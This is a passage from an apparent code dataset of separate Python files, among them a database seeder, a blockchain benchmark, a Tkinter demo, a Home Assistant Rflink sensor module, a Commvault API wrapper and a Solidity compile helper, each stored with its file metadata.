1].get('id')}\n for i in range(count)]\n return result\n\n\ndef create_uuid():\n return str(uuid.uuid1())\n\n\nif __name__ == '__main__':\n db_con = DBManipulator('db.ini')\n db_con.connect()\n\n clean_start = True\n\n if clean_start:\n db_con.drop_all_users()\n db_con.drop_all_categories()\n db_con.drop_all_messages()\n\n users = create_users(users_count)\n categories = create_categories(categories_count)\n messages = create_messages(messages_count, users, categories)\n\n # print(db_con.get_tables())\n # db_con.cursor.execute(\"SELECT * from public.users\")\n # print(db_con.cursor.fetchall())\n\n print('DEBUG: inserting users...')\n db_con.cursor.execute(\"PREPARE insert_users (uuid, text) AS INSERT INTO users VALUES($1, $2);\")\n execute_batch(db_con.cursor, \"EXECUTE insert_users (%(id)s, %(name)s)\", users)\n db_con.connection.commit()\n print('DEBUG: inserting users successful.')\n\n print('DEBUG: inserting categories...')\n db_con.cursor.execute(\"PREPARE insert_categories (uuid, text, uuid) AS INSERT INTO categories VALUES($1, $2, $3);\")\n execute_batch(db_con.cursor, \"EXECUTE insert_categories (%(id)s, %(name)s, %(parent_id)s)\", categories)\n db_con.connection.commit()\n print('DEBUG: inserting categories successful.')\n\n print('DEBUG: inserting messages...')\n db_con.cursor.execute(\n \"PREPARE mes (uuid, text, uuid, time, uuid) AS INSERT INTO messages VALUES($1, $2, $3, $4, $5);\")\n execute_batch(db_con.cursor, \"\"\"EXECUTE mes (%(id)s, %(text)s, %(category_id)s,\n %(posted_at)s, %(author_id)s)\"\"\", messages)\n db_con.connection.commit()\n print('DEBUG: inserting messages...')\n db_con.disconnect()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"466008377","text":"import argparse\nimport logging\nimport os\nimport time\nimport sys\nfrom tqdm import tqdm\n\nfrom chains.binance import MockBinance\nfrom thorchain.thorchain import ThorchainState, ThorchainClient\nfrom utils.common import Transaction, Coin, get_rune_asset\nfrom chains.aliases import get_alias\n\n# Init logging\nlogging.basicConfig(\n format=\"%(asctime)s | %(levelname).4s | %(message)s\",\n level=os.environ.get(\"LOGLEVEL\", \"INFO\"),\n)\n\nRUNE = get_rune_asset()\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--binance\", default=\"http://localhost:26660\", help=\"Mock binance server\"\n )\n parser.add_argument(\n \"--thorchain\", default=\"http://localhost:1317\", help=\"Thorchain API url\"\n )\n parser.add_argument(\n \"--thorchain-websocket\",\n default=\"ws://localhost:26657/websocket\",\n help=\"Thorchain Websocket url\",\n )\n parser.add_argument(\n \"--tx-type\", default=\"swap\", help=\"Transactions type to perform (swap or stake)\"\n )\n parser.add_argument(\n \"--num\", type=int, default=100, help=\"Number of transactions to perform\"\n )\n args = parser.parse_args()\n\n benchie = Benchie(\n args.binance, args.thorchain, args.tx_type, args.num, args.thorchain_websocket\n )\n try:\n benchie.run()\n except Exception as e:\n logging.fatal(e)\n sys.exit(1)\n\n\nclass Benchie:\n def __init__(self, bnb, thor, tx_type, num, thor_ws=None):\n self.thorchain = ThorchainState()\n\n self.thorchain_client = ThorchainClient(thor, thor_ws)\n vault_address = self.thorchain_client.get_vault_address(\"BNB\")\n vault_pubkey = self.thorchain_client.get_vault_pubkey()\n\n self.thorchain.set_vault_pubkey(vault_pubkey)\n\n self.mock_binance = MockBinance(bnb)\n self.mock_binance.set_vault_address(vault_address)\n\n self.num = num\n self.tx_type = tx_type\n if self.tx_type != \"swap\" and self.tx_type != \"stake\":\n logging.error(\"invalid tx type: \" + self.tx_type)\n os.exit(1)\n\n time.sleep(5) # give thorchain extra time to start the blockchain\n\n def error(self, err):\n self.exit = 1\n if self.fast_fail:\n raise Exception(err)\n else:\n logging.error(err)\n\n def run(self):\n logging.info(f\">>> Starting benchmark... ({self.tx_type}: {self.num})\")\n logging.info(\">>> setting up...\")\n # seed staker\n self.mock_binance.transfer(\n Transaction(\n \"BNB\",\n get_alias(\"BNB\", \"MASTER\"),\n get_alias(\"BNB\", \"STAKER-1\"),\n [\n Coin(\"BNB.BNB\", self.num * 100 * Coin.ONE),\n Coin(RUNE, self.num * 100 * Coin.ONE),\n ],\n )\n )\n\n # seed swapper\n self.mock_binance.transfer(\n Transaction(\n \"BNB\",\n get_alias(\"BNB\", \"MASTER\"),\n get_alias(\"BNB\", \"USER-1\"),\n [\n Coin(\"BNB.BNB\", self.num * 100 * Coin.ONE),\n Coin(RUNE, self.num * 100 * Coin.ONE),\n ],\n )\n )\n\n if self.tx_type == \"swap\":\n # stake BNB\n self.mock_binance.transfer(\n Transaction(\n \"BNB\",\n get_alias(\"BNB\", \"STAKER-1\"),\n get_alias(\"BNB\", \"VAULT\"),\n [\n Coin(\"BNB.BNB\", self.num * 100 * Coin.ONE),\n Coin(RUNE, self.num * 100 * Coin.ONE),\n ],\n memo=\"STAKE:BNB.BNB\",\n )\n )\n\n time.sleep(5) # give thorchain extra time to start the blockchain\n\n logging.info(\"<<< done.\")\n logging.info(\">>> compiling transactions...\")\n txns = []\n memo = f\"{self.tx_type}:BNB.BNB\"\n for x in range(0, self.num):\n if self.tx_type == \"stake\":\n coins = [\n Coin(RUNE, 10 * Coin.ONE),\n Coin(\"BNB.BNB\", 10 * Coin.ONE),\n ]\n elif self.tx_type == \"swap\":\n coins = [\n Coin(RUNE, 10 * Coin.ONE),\n ]\n txns.append(\n Transaction(\n \"BNB\",\n get_alias(\"BNB\", \"USER-1\"),\n get_alias(\"BNB\", \"VAULT\"),\n coins,\n memo=memo,\n )\n )\n\n logging.info(\"<<< done.\")\n logging.info(\">>> broadcasting transactions...\")\n self.mock_binance.transfer(txns)\n logging.info(\"<<< done.\")\n\n logging.info(\">>> timing for thorchain...\")\n start_block_height = self.thorchain_client.get_block_height()\n t1 = time.time()\n completed = 0\n\n pbar = tqdm(total=self.num)\n while completed < self.num:\n events = self.thorchain_client.events\n if len(events) == 0:\n time.sleep(1)\n continue\n completed = len([e for e in events if e.type == self.tx_type.lower()])\n pbar.update(completed)\n time.sleep(1)\n pbar.close()\n\n t2 = time.time()\n end_block_height = self.thorchain_client.get_block_height()\n total_time = t2 - t1\n total_blocks = end_block_height - start_block_height\n logging.info(\"<<< done.\")\n logging.info(f\"({self.tx_type}: {completed}\")\n logging.info(f\"Blocks: {total_blocks}, {total_time} seconds)\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":5626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"158147315","text":"from tkinter import *\n\n\nclass Aplication(Frame):\n \"\"\"GUI - приложение, владеющее секретом долголетия.\"\"\"\n def __init__(self, master):\n \"\"\"Инициализирует рамку\"\"\"\n # Конструктор надкласса.\n super(Aplication, self).__init__(master)\n self.grid()\n self.create_widgets()\n\n def create_widgets(self):\n \"\"\"Создаёт кнопку, текстовое поле и текстовую область.\"\"\"\n # метка-инструкция\n self.inst_lbl = Label(self, text='Чтобы узнать секрет долголетия, введите пароль')\n self.inst_lbl.grid(row=0, column=0, columnspan=2, sticky=W)\n # метка около поля воода пароля\n self.pw_lbl = Label(self, text='Пароль: ')\n self.pw_lbl.grid(row=1, column=0, sticky=W)\n # текстовое поле для ввода пароля\n self.pw_ent = Entry(self)\n self.pw_ent.grid(row=1, column=1, sticky=W)\n # кнопка отправки значания\n self.submit_bttn = Button(self, text='Узнать секрет', command = self.reveal)\n self.submit_bttn.grid(row=2, column=0, sticky=W)\n # создание текстовой области, в которую будет выведен ответ\n self.secret_txt = Text(self, width=35, height=5, wrap=WORD)\n self.secret_txt.grid(row=3, column=0, columnspan=2, sticky=W)\n\n def reveal(self):\n \"\"\"В зависимости от введенного пароля отвечает разными сообщениями.\"\"\"\n contents = self.pw_ent.get() # get() возвращает текстовое содержимое элемента\n\n if contents == \"secret\":\n message = 'Чтобы дожить до 100 лет, надо сначала дожить до 99, а потом вести себя ОЧЕНЬ осторожно.'\n else:\n message = 'Вы ввели неправельный пароль, так что я не могу поделиться тайной с вами.'\n\n self.secret_txt.delete(0.0, END)\n self.secret_txt.insert(0.0, message)\n\n\n# Основная часть\ntk = Tk()\ntk.title('Долгожитель')\ntk.geometry('300x150')\n\napp = Aplication(tk)\ntk.mainloop()","sub_path":"GUI/GUI - long-liver.py","file_name":"GUI - long-liver.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"339709312","text":"import unittest\nfrom unittest.mock import patch, call\nimport game\n\n\nclass TestGame(unittest.TestCase):\n\n\n @patch('game.get_secret_number', return_value=4)\n @patch('game.get_guess', side_effect=[3, 10, 4])\n @patch('builtins.print')\n def test_play_game(self, mock_print, mock_guesses, mock_secret):\n\n game.main()\n\n # Create a list of expected call objects. These will be compared to the actual calls made\n # to the mock_print method. \n expected_calls = [ call('too low!') , call('too high!') , call('Correct!') ]\n self.assertEqual(expected_calls, mock_print.call_args_list)\n\n\nif __name__ == '__main__':\n unittest.main()\n\n\n","sub_path":"guessing_game/test_game.py","file_name":"test_game.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"316869405","text":"\n\nfrom xai.brain.wordbase.nouns._tusk import _TUSK\n\n#calss header\nclass _TUSKS(_TUSK, ):\n\tdef __init__(self,): \n\t\t_TUSK.__init__(self)\n\t\tself.name = \"TUSKS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"tusk\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_tusks.py","file_name":"_tusks.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"615227767","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /data/PROGETTI/saxix/django-whatsnew/whatsnew/migrations/0002_auto__add_field_whatsnew_released.py\n# Compiled at: 2014-04-02 14:28:33\nimport datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\nclass Migration(SchemaMigration):\n\n def forwards(self, orm):\n db.add_column('whatsnew_whatsnew', 'released', self.gf('django.db.models.fields.BooleanField')(default=False), keep_default=False)\n\n def backwards(self, orm):\n db.delete_column('whatsnew_whatsnew', 'released')\n\n models = {'whatsnew.whatsnew': {'Meta': {'object_name': 'WhatsNew'}, 'content': (\n 'django.db.models.fields.TextField', [], {}), \n 'id': (\n 'django.db.models.fields.AutoField', [], {'primary_key': 'True'}), \n 'released': (\n 'django.db.models.fields.BooleanField', [], {'default': 'False'}), \n 'version': (\n 'django.db.models.fields.CharField', [], {'max_length': '30'})}}\n complete_apps = [\n 'whatsnew']","sub_path":"pycfiles/whatsnew-0.3.tar/0002_auto__add_field_whatsnew_released.py","file_name":"0002_auto__add_field_whatsnew_released.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"99438675","text":"import math\nfrom networktables import NetworkTables\nclass Angles:\n def __init__(self):\n self.diagonal_FOV = 68.5 #degrees\n self.horizontal_FOV = None\n self.vertical_FOV = None\n self.combined_aspect = None #800\n self.x_aspect = 640 #Image width\n self.y_aspect = 480 #Image height\n self.focal_length = None\n self.center_x = None\n self.center_y = None\n\n self.__find_FOVs()\n\n self.target_height = 2.0955 # in meters\n self.camera_height = 0.50 # in meters\n self.camera_y_angle_offset = .61 # in radians\n #Find FOV angles\n def __find_FOVs(self):\n self.center_x = self.x_aspect/2 -.5\n self.center_y = self.y_aspect/2 -.5\n self.combined_aspect = math.hypot(self.x_aspect,self.y_aspect)\n self.horizontal_FOV = 2*(math.atan( (math.tan(math.radians(self.diagonal_FOV))/2) * (self.x_aspect/self.combined_aspect) ))\n self.vertical_FOV = 2*(math.atan( (math.tan(math.radians(self.diagonal_FOV))/2) * (self.y_aspect/self.combined_aspect) ))\n self.focal_length = self.x_aspect / (2*math.tan(self.horizontal_FOV/2))\n\n\n def x_angle(self,u):\n u_deg = math.degrees(math.atan((u-self.center_x)/self.focal_length))\n u_deg = int(u_deg*1000)/1000.0\n return u_deg\n\n def y_angle(self,v):\n v_deg = -1*math.degrees(math.atan((v-self.center_y)/self.focal_length))\n v_deg = int(v_deg*1000)/1000.0\n return v_deg\n\n def dist(self,v):\n v_rad = math.atan((v-self.center_y)/self.focal_length)\n dist = (self.target_height-self.camera_height)/(math.tan(v_rad-self.camera_y_angle_offset+.0000000000001)) # extra added value prevents divide by zero\n dist = int(dist*1000)/1000.0\n return dist;\n","sub_path":"conversion.py","file_name":"conversion.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"174372267","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport blib, re\nfrom blib import msg, errandmsg, site\nimport pywikibot\n\ndef process_page(page, index, args, contents):\n pagetitle = str(page.title())\n def pagemsg(txt):\n msg(\"Page %s %s: %s\" % (index, pagetitle, txt))\n def errandpagemsg(txt):\n errandmsg(\"Page %s %s: %s\" % (index, pagetitle, txt))\n if args.verbose:\n pagemsg(\"Processing\")\n if page.exists():\n errandpagemsg(\"Page already exists, not overwriting\")\n return\n comment = 'Created page with \"%s\"' % contents\n if args.save:\n page.text = contents\n if blib.safe_page_save(page, comment, errandpagemsg):\n errandpagemsg(\"Created page, comment = %s\" % comment)\n else:\n pagemsg(\"Would create, comment = %s\" % comment)\n\nparams = blib.create_argparser(\"Create pages\", include_pagefile=True)\nparams.add_argument(\"--contents\", help=\"Contents of pages\", required=True)\nargs = params.parse_args()\nstart, end = blib.parse_start_end(args.start, args.end)\n\ndef do_process_page(page, index):\n return process_page(page, index, args, args.contents)\nblib.do_pagefile_cats_refs(args, start, end, do_process_page)\n","sub_path":"create_pages.py","file_name":"create_pages.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"56957674","text":"#!/usr/bin/env python\n\"\"\"\n SlipStream Client\n =====\n Copyright (C) 2017 SixSq Sarl (sixsq.com)\n =====\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\nfrom slipstream.command.CloudClientCommand import main\nfrom slipstream.command.TerminateInstancesCommand import TerminateInstancesCommand\nfrom slipstream_kubernetes.KubernetesCommand import KubernetesCommand\nfrom slipstream.ConfigHolder import ConfigHolder\nfrom slipstream.NodeDecorator import KEY_RUN_CATEGORY\n\n\nclass KubernetesTerminateInstances(TerminateInstancesCommand, KubernetesCommand):\n\n INSTANCES_NAMESPACE = \"instance-namespace\"\n\n def _set_command_specific_options(self, parser):\n parser.add_option('--' + self.INSTANCE_IDS_KEY, dest=self.INSTANCE_IDS_KEY,\n help='Instance ID (can be used multiple times)',\n action='append', default=[], metavar='ID')\n parser.add_option('--' + self.INSTANCES_IDS_FILE_KEY, dest=self.INSTANCES_IDS_FILE_KEY,\n help='File containing a list of instance ids (one per line)',\n default=None, metavar='FILE')\n parser.add_option('--' + self.INSTANCES_NAMESPACE, dest=self.INSTANCES_NAMESPACE,\n help='Namespace where the instances are',\n default=[], metavar='NAMESPACE')\n\n def do_work(self):\n ids = self.get_option(self.INSTANCE_IDS_KEY)\n ch = ConfigHolder(options={'verboseLevel': self.options.verbose and 3 or 0,\n 'retry': False,\n KEY_RUN_CATEGORY: ''},\n context={'foo': 'bar'})\n cc = self.get_connector_class()(ch)\n\n # pylint: disable=protected-access\n cc._initialization(self.user_info, **self.get_initialization_extra_kwargs())\n\n fname = self.get_option(self.INSTANCES_IDS_FILE_KEY)\n if fname:\n with open(fname) as f:\n ids += f.read().splitlines()\n\n if cc.has_capability(cc.CAPABILITY_VAPP):\n cc.stop_vapps_by_ids(ids, self.get_option(self.INSTANCES_NAMESPACE))\n else:\n cc._stop_instances_in_namespace(ids, self.get_option(self.INSTANCES_NAMESPACE))\n\n def __init__(self):\n super(KubernetesTerminateInstances, self).__init__()\n\n\nif __name__ == \"__main__\":\n main(KubernetesTerminateInstances)\n","sub_path":"kubernetes/python/tar/slipstream_kubernetes/KubernetesTerminateInstancesCommand.py","file_name":"KubernetesTerminateInstancesCommand.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"632497080","text":"import logging\nimport xmltodict\nfrom dicttoxml import dicttoxml\n\nfrom .base_session import BaseSession\nfrom .exceptions import raise_requests_error\n\nlog = logging.getLogger(__name__)\n\n\nclass ClientGroupSession(BaseSession):\n \"\"\"Methods for client groups.\"\"\"\n def __init__(self, cache_methods=None, *args, **kwargs):\n cache_methods = cache_methods or ['get_client_groups',\n 'get_client_group_properties',\n 'get_client_group']\n super(ClientGroupSession, self).__init__(cache_methods=cache_methods, *args, **kwargs)\n\n def get_client_groups(self):\n \"\"\"Get clients.\n\n Returns:\n list: clients\n \"\"\"\n path = 'ClientGroup'\n res = self.request('GET', path)\n data = res.json()\n if not 'groups' in data:\n groups = []\n else:\n groups = data['groups']\n return groups\n\n def get_client_group_properties(self, group_id, xml=False):\n \"\"\"Get client group properties.\n\n This call sometimes replies in XML, because who cares about\n Accept headers right. So, we must take the reply in XML and\n convert it to JSON to maintain sanity.\n\n Args:\n group_id (str): client group ID\n xml (boolean): If True, returns the raw XML response.\n\n Returns:\n dict: client group properties\n \"\"\"\n if isinstance(group_id, int):\n log.warning('deprecated: group_id support for int for backward compatibility only')\n group_id = str(group_id)\n path = 'ClientGroup/{}'.format(group_id)\n if xml:\n headers = {\"Accept\": \"application/xml\"}\n else:\n headers = {}\n res = self.request('GET', path, headers=headers)\n # If you are using a < v10 SP12 this call will respond in\n # xml even though we are requesting json.\n if xml:\n return res.text\n else:\n if not res.json():\n # turn wrong xml into json\n data = xmltodict.parse(res.text)\n else:\n data = res.json()\n try:\n props = data['clientGroupDetail']\n except KeyError:\n # support previous Commvault api versions\n props = data['App_PerformClientGroupResp']['clientGroupDetail']\n if not props:\n msg = 'No client properties found for client group {}'.format(client_id)\n raise_requests_error(404, msg)\n return props\n\n\n def post_client_group(self, props):\n \"\"\"Create a new client group\n\n Args:\n props (str): XML client group properties string\n\n Returns:\n dict: response\n \"\"\"\n path = 'ClientGroup'\n res = self.request('POST', path, payload_nondict=props, headers={\"Content-type\": \"application/xml\"})\n if not res.json():\n data = xmltodict.parse(res.text)\n else:\n data = res.json()\n return data['clientGroupDetail']\n\n def post_client_group_properties(self, client_group_id, props):\n \"\"\"Post client group properties.\n\n Args:\n client_group_id (str): client group id\n props (str): XML subclient properties string\n\n Returns:\n dict: response\n \"\"\"\n if isinstance(client_group_id, int):\n log.warning('deprecated: subclient_id support for int for backward compatibility only')\n client_group_id = str(client_group_id)\n path = 'ClientGroup/{}'.format(client_group_id)\n res = self.request('POST', path, payload_nondict=props, headers={\"Content-type\": \"application/xml\"})\n if not res.json():\n data = xmltodict.parse(res.text)\n else:\n data = res.json()\n return data\n","sub_path":"pinkopy/client_groups.py","file_name":"client_groups.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"485913920","text":"\"\"\"Support for Rflink sensors.\"\"\"\nfrom __future__ import annotations\n\nfrom typing import Any\n\nfrom rflink.parser import PACKET_FIELDS, UNITS\nimport voluptuous as vol\n\nfrom homeassistant.components.sensor import (\n PLATFORM_SCHEMA,\n SensorDeviceClass,\n SensorEntity,\n SensorEntityDescription,\n SensorStateClass,\n)\nfrom homeassistant.const import (\n CONF_DEVICES,\n CONF_NAME,\n CONF_SENSOR_TYPE,\n CONF_UNIT_OF_MEASUREMENT,\n UnitOfSpeed,\n UnitOfTemperature,\n)\nfrom homeassistant.core import HomeAssistant\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.helpers.dispatcher import async_dispatcher_connect\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\nfrom homeassistant.helpers.typing import ConfigType, DiscoveryInfoType\n\nfrom . import (\n CONF_ALIASES,\n CONF_AUTOMATIC_ADD,\n DATA_DEVICE_REGISTER,\n DATA_ENTITY_LOOKUP,\n EVENT_KEY_ID,\n EVENT_KEY_SENSOR,\n EVENT_KEY_UNIT,\n SIGNAL_AVAILABILITY,\n SIGNAL_HANDLE_EVENT,\n TMP_ENTITY,\n RflinkDevice,\n)\n\nSENSOR_ICONS = {\n \"humidity\": \"mdi:water-percent\",\n \"battery\": \"mdi:battery\",\n}\n\nSENSOR_TYPES = (\n # check new descriptors against PACKET_FIELDS & UNITS from rflink.parser\n SensorEntityDescription(\n key=\"distance\",\n name=\"Distance\",\n device_class=SensorDeviceClass.DISTANCE,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n SensorEntityDescription(\n key=\"barometric_pressure\",\n name=\"Barometric pressure\",\n device_class=SensorDeviceClass.PRESSURE,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n SensorEntityDescription(\n key=\"average_windspeed\",\n name=\"Average windspeed\",\n device_class=SensorDeviceClass.WIND_SPEED,\n state_class=SensorStateClass.MEASUREMENT,\n native_unit_of_measurement=UnitOfSpeed.KILOMETERS_PER_HOUR,\n ),\n SensorEntityDescription(\n key=\"windgusts\",\n name=\"Wind gusts\",\n device_class=SensorDeviceClass.WIND_SPEED,\n state_class=SensorStateClass.MEASUREMENT,\n native_unit_of_measurement=UnitOfSpeed.KILOMETERS_PER_HOUR,\n ),\n SensorEntityDescription(\n key=\"windspeed\",\n name=\"Wind speed\",\n device_class=SensorDeviceClass.WIND_SPEED,\n state_class=SensorStateClass.MEASUREMENT,\n native_unit_of_measurement=UnitOfSpeed.KILOMETERS_PER_HOUR,\n ),\n SensorEntityDescription(\n key=\"temperature\",\n name=\"Temperature\",\n device_class=SensorDeviceClass.TEMPERATURE,\n state_class=SensorStateClass.MEASUREMENT,\n native_unit_of_measurement=UnitOfTemperature.CELSIUS,\n ),\n SensorEntityDescription(\n key=\"windtemp\",\n name=\"Wind temperature\",\n device_class=SensorDeviceClass.TEMPERATURE,\n state_class=SensorStateClass.MEASUREMENT,\n native_unit_of_measurement=UnitOfTemperature.CELSIUS,\n ),\n SensorEntityDescription(\n key=\"windchill\",\n name=\"Wind chill\",\n device_class=SensorDeviceClass.TEMPERATURE,\n state_class=SensorStateClass.MEASUREMENT,\n native_unit_of_measurement=UnitOfTemperature.CELSIUS,\n ),\n)\n\nSENSOR_TYPES_DICT = {desc.key: desc for desc in SENSOR_TYPES}\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(\n {\n vol.Optional(CONF_AUTOMATIC_ADD, default=True): cv.boolean,\n vol.Optional(CONF_DEVICES, default={}): {\n cv.string: vol.Schema(\n {\n vol.Optional(CONF_NAME): cv.string,\n vol.Required(CONF_SENSOR_TYPE): cv.string,\n vol.Optional(CONF_UNIT_OF_MEASUREMENT): cv.string,\n vol.Optional(CONF_ALIASES, default=[]): vol.All(\n cv.ensure_list, [cv.string]\n ),\n }\n )\n },\n },\n extra=vol.ALLOW_EXTRA,\n)\n\n\ndef lookup_unit_for_sensor_type(sensor_type):\n \"\"\"Get unit for sensor type.\n\n Async friendly.\n \"\"\"\n field_abbrev = {v: k for k, v in PACKET_FIELDS.items()}\n\n return UNITS.get(field_abbrev.get(sensor_type))\n\n\ndef devices_from_config(domain_config):\n \"\"\"Parse configuration and add Rflink sensor devices.\"\"\"\n devices = []\n for device_id, config in domain_config[CONF_DEVICES].items():\n device = RflinkSensor(device_id, **config)\n devices.append(device)\n\n return devices\n\n\nasync def async_setup_platform(\n hass: HomeAssistant,\n config: ConfigType,\n async_add_entities: AddEntitiesCallback,\n discovery_info: DiscoveryInfoType | None = None,\n) -> None:\n \"\"\"Set up the Rflink platform.\"\"\"\n async_add_entities(devices_from_config(config))\n\n async def add_new_device(event):\n \"\"\"Check if device is known, otherwise create device entity.\"\"\"\n device_id = event[EVENT_KEY_ID]\n\n device = RflinkSensor(\n device_id,\n event[EVENT_KEY_SENSOR],\n event[EVENT_KEY_UNIT],\n initial_event=event,\n )\n # Add device entity\n async_add_entities([device])\n\n if config[CONF_AUTOMATIC_ADD]:\n hass.data[DATA_DEVICE_REGISTER][EVENT_KEY_SENSOR] = add_new_device\n\n\nclass RflinkSensor(RflinkDevice, SensorEntity):\n \"\"\"Representation of a Rflink sensor.\"\"\"\n\n def __init__(\n self,\n device_id: str,\n sensor_type: str,\n unit_of_measurement: str | None = None,\n initial_event=None,\n **kwargs: Any,\n ) -> None:\n \"\"\"Handle sensor specific args and super init.\"\"\"\n self._sensor_type = sensor_type\n self._unit_of_measurement = unit_of_measurement\n if sensor_type in SENSOR_TYPES_DICT:\n self.entity_description = SENSOR_TYPES_DICT[sensor_type]\n elif not unit_of_measurement:\n self._unit_of_measurement = lookup_unit_for_sensor_type(sensor_type)\n\n super().__init__(device_id, initial_event=initial_event, **kwargs)\n\n def _handle_event(self, event):\n \"\"\"Domain specific event handler.\"\"\"\n self._state = event[\"value\"]\n\n async def async_added_to_hass(self) -> None:\n \"\"\"Register update callback.\"\"\"\n # Remove temporary bogus entity_id if added\n tmp_entity = TMP_ENTITY.format(self._device_id)\n if (\n tmp_entity\n in self.hass.data[DATA_ENTITY_LOOKUP][EVENT_KEY_SENSOR][self._device_id]\n ):\n self.hass.data[DATA_ENTITY_LOOKUP][EVENT_KEY_SENSOR][\n self._device_id\n ].remove(tmp_entity)\n\n # Register id and aliases\n self.hass.data[DATA_ENTITY_LOOKUP][EVENT_KEY_SENSOR][self._device_id].append(\n self.entity_id\n )\n if self._aliases:\n for _id in self._aliases:\n self.hass.data[DATA_ENTITY_LOOKUP][EVENT_KEY_SENSOR][_id].append(\n self.entity_id\n )\n self.async_on_remove(\n async_dispatcher_connect(\n self.hass, SIGNAL_AVAILABILITY, self._availability_callback\n )\n )\n self.async_on_remove(\n async_dispatcher_connect(\n self.hass,\n SIGNAL_HANDLE_EVENT.format(self.entity_id),\n self.handle_event_callback,\n )\n )\n\n # Process the initial event now that the entity is created\n if self._initial_event:\n self.handle_event_callback(self._initial_event)\n\n @property\n def native_unit_of_measurement(self):\n \"\"\"Return measurement unit.\"\"\"\n if self._unit_of_measurement:\n return self._unit_of_measurement\n if hasattr(self, \"entity_description\"):\n return self.entity_description.native_unit_of_measurement\n return None\n\n @property\n def native_value(self):\n \"\"\"Return value.\"\"\"\n return self._state\n\n @property\n def icon(self):\n \"\"\"Return possible sensor specific icon.\"\"\"\n if self._sensor_type in SENSOR_ICONS:\n return SENSOR_ICONS[self._sensor_type]\n","sub_path":"homeassistant/components/rflink/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":8004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"72965917","text":"import json\nimport os\nfrom typing import Any, Dict, List\n\nfrom eth_utils import add_0x_prefix\nfrom solcx import compile_standard\nfrom web3 import Web3\nfrom web3._utils.abi import get_constructor_abi\nfrom web3._utils.contracts import encode_abi\n\nfrom .files import find_files\n\nDEFAULT_OUTPUT_SELECTION = [\n \"abi\",\n \"devdoc\",\n \"userdoc\",\n \"metadata\",\n \"evm.bytecode\",\n \"evm.deployedBytecode\",\n]\n\nABI_OUTPUT_SELECTION = [\"abi\", \"userdoc\"]\n\nDEFAULT_EVM_VERSION = \"petersburg\"\n\n\ndef load_sources(file_paths: List[str]):\n result = {}\n for file_path in file_paths:\n with open(file_path) as source_file:\n result[file_path] = {\"content\": source_file.read()}\n return result\n\n\ndef normalize_contract_data(contract_data: Dict):\n result = {}\n\n for key, value in contract_data.items():\n if key == \"evm\":\n evm_data = value\n\n if \"bytecode\" in evm_data:\n result[\"bytecode\"] = add_0x_prefix(\n evm_data[\"bytecode\"].get(\"object\", \"\")\n )\n\n if \"deployedBytecode\" in evm_data:\n result[\"deployedBytecode\"] = add_0x_prefix(\n evm_data[\"deployedBytecode\"].get(\"object\", \"\")\n )\n\n elif key == \"metadata\":\n if value:\n result[key] = json.loads(value)\n\n else:\n result[key] = value\n\n return result\n\n\ndef normalize_compiled_contracts(compiled_contracts: Dict, file_paths: List[str]):\n result: Dict[str, Dict] = {}\n\n for source_path, file_contracts in compiled_contracts.items():\n if source_path not in file_paths:\n continue\n\n for contract_name, raw_contract_data in file_contracts.items():\n contract_data = normalize_contract_data(raw_contract_data)\n if contract_name not in result:\n result[contract_name] = contract_data\n else:\n raise BaseException(\"Can not compile two contracts with the same name\")\n\n return result\n\n\ndef log_compilation_errors(errors: List[Dict]):\n for error in errors:\n if \"formattedMessage\" in error:\n print(error[\"formattedMessage\"])\n else:\n print(error[\"message\"])\n\n\ndef compile_project(\n contracts_path: str = None,\n *,\n file_paths: List[str] = None,\n allow_paths: List[str] = None,\n pattern=\"*.sol\",\n optimize=True,\n optimize_runs=500,\n only_abi=False,\n evm_version: str = DEFAULT_EVM_VERSION,\n):\n \"\"\"\n Compiles all contracts of the project into a single output\n Args:\n contracts_path: The path of the folder that includes the contracts, defaults to 'contracts'\n file_paths: A list of to compiled 